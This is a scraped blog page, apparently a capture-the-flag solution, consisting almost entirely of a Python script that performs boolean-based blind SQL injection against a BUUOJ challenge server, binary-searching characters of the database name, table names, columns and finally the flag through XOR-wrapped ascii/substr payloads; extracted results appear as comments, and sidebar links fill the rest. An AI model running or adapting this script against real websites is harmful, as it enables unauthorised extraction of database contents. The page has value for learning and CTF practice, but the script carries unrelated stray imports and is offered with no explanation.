当前位置:网站首页>Bool blind note - score query
Bool blind note - score query
2022-07-03 19:39:00 【Forever culvert】
from aiohttp import Payload
from cherrypy import url
import requests
import time
from sympy import parallel_poly_from_expr
url = "http://0cfdc5c8-c87c-4e7f-b632-7f6c6ff7a2d0.node4.buuoj.cn:81/?stunum="
payload1 = "1^(ascii(substr((select(database())),{},1))>{})^1"
payload2 = "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')),{},1))>{})^1"
payload3 = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),{},1))>{})^1"
payload4 = "1^(ascii(substr((select(group_concat(value))from(ctf.flag)),{},1))>{})^1"
database = ""
for x in range(1, 1000):
low = 32
high = 127
mid = (low+high) // 2
while low < high:
playload = payload4.format(x, mid)
new_url = url + playload
r = requests.get(new_url)
if "Hi admin, your score is: 100" in r.text:
low = mid + 1
else:
high = mid
mid = (low+high) // 2
if (mid == 32 or mid == 132):
break
database += chr(mid)
print(database)
time.sleep(1)
print(database)
# ctf
# flag,score
# flag,value
边栏推荐
- Rd file name conflict when extending a S4 method of some other package
- Leetcode 1189. Maximum number of balloons (special character count)
- P3402 persistent and searchable
- Pecan — Overview
- 03 -- QT OpenGL EBO draw triangle
- Day10 ---- 强制登录, token刷新与jwt禁用
- Unittest framework is basically used
- Day11 ---- 我的页面, 用户信息获取修改与频道接口
- 2022-06-25 网工进阶(十一)IS-IS-三大表(邻居表、路由表、链路状态数据库表)、LSP、CSNP、PSNP、LSP的同步过程
- The most valuable thing
猜你喜欢

2022-06-27 advanced network engineering (XII) IS-IS overhead type, overhead calculation, LSP processing mechanism, route revocation, route penetration

2022.2.14 Li Kou - daily question - single element in an ordered array

5- (4-nitrophenyl) - 10,15,20-triphenylporphyrin ntpph2/ntppzn/ntppmn/ntppfe/ntppni/ntppcu/ntppcd/ntppco and other metal complexes
![Meso tetra [P - (p-n-carbazole benzylidene imino)] phenylporphyrin (tcipp) /eu (tcipp) [pc( α- 2-oc8h17) 4] and euh (tcipp) [pc (a-2-oc8h17) 4] supplied by Qiyue](/img/5b/fc776a1982e24b82984d82be6a016f.jpg)
Meso tetra [P - (p-n-carbazole benzylidene imino)] phenylporphyrin (tcipp) /eu (tcipp) [pc( α- 2-oc8h17) 4] and euh (tcipp) [pc (a-2-oc8h17) 4] supplied by Qiyue

kubernetes集群搭建efk日志收集平台

Basic principle of LSM tree

2022-07-02 advanced network engineering (XV) routing policy - route policy feature, policy based routing, MQC (modular QoS command line)

These problems should be paid attention to in the production of enterprise promotional videos

10 smart contract developer tools that miss and lose

Chapter 1: find all factorial sums, Grand Prix site unified programming, three factorial sums, graphic point scanning, recursive factorial n of n!, Find the factorial n of n!, King Shehan miscalculate
随机推荐
2022 - 06 - 30 networker Advanced (XIV) Routing Policy Matching Tool [ACL, IP prefix list] and policy tool [Filter Policy]
Win10 share you don't have permission
2020 intermediate financial management (escort class)
SQL injection for Web Security (1)
Foundation of ActiveMQ
第二章:4位卡普雷卡数,搜索偶数位卡普雷卡数,搜索n位2段和平方数,m位不含0的巧妙平方数,指定数字组成没有重复数字的7位平方数,求指定区间内的勾股数组,求指定区间内的倒立勾股数组
Today I am filled with emotion
[optics] vortex generation based on MATLAB [including Matlab source code 1927]
Phpstudy set LAN access
2022-07-02 advanced network engineering (XV) routing policy - route policy feature, policy based routing, MQC (modular QoS command line)
Chapter 2: find the number of daffodils based on decomposition, find the number of daffodils based on combination, find the conformal number in [x, y], explore the n-bit conformal number, recursively
Day18 - basis of interface testing
Thesis study - 7 Very Deep Convolutional Networks for Large-Scale Image Recognition (3/3)
Use of aggregate functions
Bad mentality leads to different results
5- (4-nitrophenyl) - 10,15,20-triphenylporphyrin ntpph2/ntppzn/ntppmn/ntppfe/ntppni/ntppcu/ntppcd/ntppco and other metal complexes
The necessity of lean production and management in sheet metal industry
BOC protected alanine zinc porphyrin Zn · TAPP ala BOC / alanine zinc porphyrin Zn · TAPP ala BOC / alanine zinc porphyrin Zn · TAPP ala BOC / alanine zinc porphyrin Zn · TAPP ala BOC supplied by Qiyu
The earliest record
Xctf attack and defense world crypto advanced area best_ rsa